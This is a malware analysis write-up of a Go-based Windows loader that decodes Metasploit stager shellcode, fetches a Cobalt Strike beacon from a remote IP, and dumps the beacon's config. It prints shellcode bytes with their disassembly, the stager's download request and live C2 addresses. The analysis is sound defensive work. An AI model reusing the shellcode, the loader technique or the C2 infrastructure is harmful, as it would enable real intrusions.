Skip to content

Latest commit

 

History

History
99 lines (67 loc) · 5.43 KB

f8c94e76f4d756924bf929b32f85158bc81911ce4a606af67e37460405e0ad3f.md

File metadata and controls

99 lines (67 loc) · 5.43 KB

Sample

f8c94e76f4d756924bf929b32f85158bc81911ce4a606af67e37460405e0ad3f

Characteristics

  • Golang
  • 64 bit Windows
  • VT Detections 8/72

Execution Overview

Sample immediately copies over a blob of data that will be single byte XOR decoded

Python>a = 0x49a620
Python>for i in range(0x3a0):
Python>  t = Byte(a+i)
Python>  t ^= 0x5d
Python>  PatchByte(a+i, t)

The XOR decoded data is metasploit shellcode commonly used as a stager for loading meterpreter or cobaltstrike.

Downloading next layer:

> GET /xn1F HTTP/1.1
> Host: 106.53.232.176
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36

Server uses a fake jquery cert

*  subject: C=US; ST=US; L=California; O=jQuery; OU=Certificate Authority; CN=jquery.com
*  issuer: C=US; ST=US; L=California; O=jQuery; OU=Certificate Authority; CN=jquery.com
*  SSL certificate verify result: self signed certificate (18), continuing anyway.

Downloaded file xn1F: beb59218a17324f3ce10a4416a5d4a8f9a2ba649f0ba36d6d4f6de610bd2262d

This data will be directly executed, the bytes on top are a self decoding loop for decoding beacon which will then perform reflective loading to load itself.

# rasm2 -D -b 64 -k windows "fc48 83e4 f0eb 335d 8b45 0048 83c5 048b4d00 31c1 4883 c504 558b 5500 31c2 89550031 d048 83c5 0483 e904 31d2 39d1 7402ebe7 58fc 4883 e4f0 ffd0 e8c8 ffff ff16f363 5d16 0960 5d5b a922 0f0e e1ab ea46"
0x00000000   1                       fc  cld
0x00000001   4                 4883e4f0  and rsp, 0xfffffffffffffff0
0x00000005   2                     eb33  jmp 0x3a
0x00000007   1                       5d  pop rbp
0x00000008   3                   8b4500  mov eax, dword [rbp]
0x0000000b   4                 4883c504  add rbp, 4
0x0000000f   3                   8b4d00  mov ecx, dword [rbp]
0x00000012   2                     31c1  xor ecx, eax
0x00000014   4                 4883c504  add rbp, 4
0x00000018   1                       55  push rbp
0x00000019   3                   8b5500  mov edx, dword [rbp]
0x0000001c   2                     31c2  xor edx, eax
0x0000001e   3                   895500  mov dword [rbp], edx
0x00000021   2                     31d0  xor eax, edx
0x00000023   4                 4883c504  add rbp, 4
0x00000027   3                   83e904  sub ecx, 4
0x0000002a   2                     31d2  xor edx, edx
0x0000002c   2                     39d1  cmp ecx, edx
0x0000002e   2                     7402  je 0x32
0x00000030   2                     ebe7  jmp 0x19
0x00000032   1                       58  pop rax
0x00000033   1                       fc  cld
0x00000034   4                 4883e4f0  and rsp, 0xfffffffffffffff0
0x00000038   2                     ffd0  call rax
0x0000003a   5               e8c8ffffff  call 7
0x0000003f   1                       16  invalid

The decoding gets the address of the encoded data by performing a jump and call chain. This will push the address of the data after the call instruction onto the stack, next the dword value XOR key and XOR encoded size value is retrieved. Then the XOR decoding is done, the key ends up being XORd by the cleartext dword every iteration.

After decoding we can dump the CobaltStrike beacon config:

Beacon config:

{'PROXY_BEHAVIOR': '1', 'PROTOCOL': '8', 'SPAWNTO_X64': '%windir%\\sysnative\\rundll32.exe', 'SLEEPTIME': '10000', 'KillDate': '0', 'C2_VERB_GET': 'GET', 'ProcInject_Prepend_x64': '', 'ProcInject_StartRWX': '64', 'DNS_SLEEP': '0', 'ProcInject_Stub': '\xa5l\x818d\xaf\x87\x8aL\x10\x08<\xa1W\x8e\n', 'HostHeader': '', 'ProcInject_Prepend_x86': '', 'ProcInject_MinAllocSize': '0', 'ProcInject_UseRWX': '64', 'MAXGET': '1403644', 'USERAGENT': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'PORT': '443', 'DNS_IDLE': '0', 'ProcInject_AllocationMethod': '0', 'UNKNOWN55': '30', 'UsesCookies': '1', 'C2_POSTREQ': "[('_HEADER', 0, 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'), ('_HEADER', 0, 'Accept-Encoding: gzip, deflate'), ('BUILD', ('MASK',))]", 'WATERMARK': '305419896', 'textSectEnd': '0', 'PUBKEY': '30819f300d06092a864886f70d010101050003818d003081890281810095e0157049a3b398f64386cb92c60e6735ea9b6b2ad403259975212790cca0eb351285a9dfb4b8ecf2ed72226d408b64178050a8da5bef9563b2f53a905ab90f5e96ba008bdf4e171d3f2b4ca6b194da29218aa306962c4622a5ec421e569021c49bcee6b97706a6c5692489a0bd3d6ead5b22417711ba5ffdf74afe70b90c230203010001', 'SPAWNTO_X86': '%windir%\\syswow64\\rundll32.exe', 'C2_REQUEST': "[('_HEADER', 0, 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'), ('_HEADER', 0, 'Accept-Encoding: gzip, deflate'), ('BUILD', ('BASE64URL',)), ('HEADER', 0, 'Cookie')]", 'CRYPTO_sCHEME': '0', 'ITTER': '30', 'C2_RECOVER': '\x04\x00\x00\x00\x01\x00\x00\x05\xf2\x00\x00\x00\x02\x00\x00\x00T\x00\x00\x00\x02\x00\x00\x0f[\x00\x00\x00\r\x00\x00\x00\x0f', 'C2_CHUNK_POST': '0', 'ProcInject_Execute': '\x01\x02\x03\x04', 'PIPENAME': '', 'C2_VERB_POST': 'POST', 'bStageCleanup': '0', 'SPAWNTO': '', 'SUBMITURI': '/jquery-3.3.2.min.js', 'DOMAINS': '106.53.232.176,/jquery-3.3.1.min.js,121.196.25.148,/jquery-3.3.1.min.js,47.96.82.40,/jquery-3.3.1.min.js,49.234.9.94,/jquery-3.3.1.min.js,106.52.51.225,/jquery-3.3.1.min.js', 'bCFGCaution': '0', 'MAXDNS': '255'}

Watermark is related to the leaked version of CobaltStrike which would make me believe this not a red team, if it is they need to fix their use of stolen software.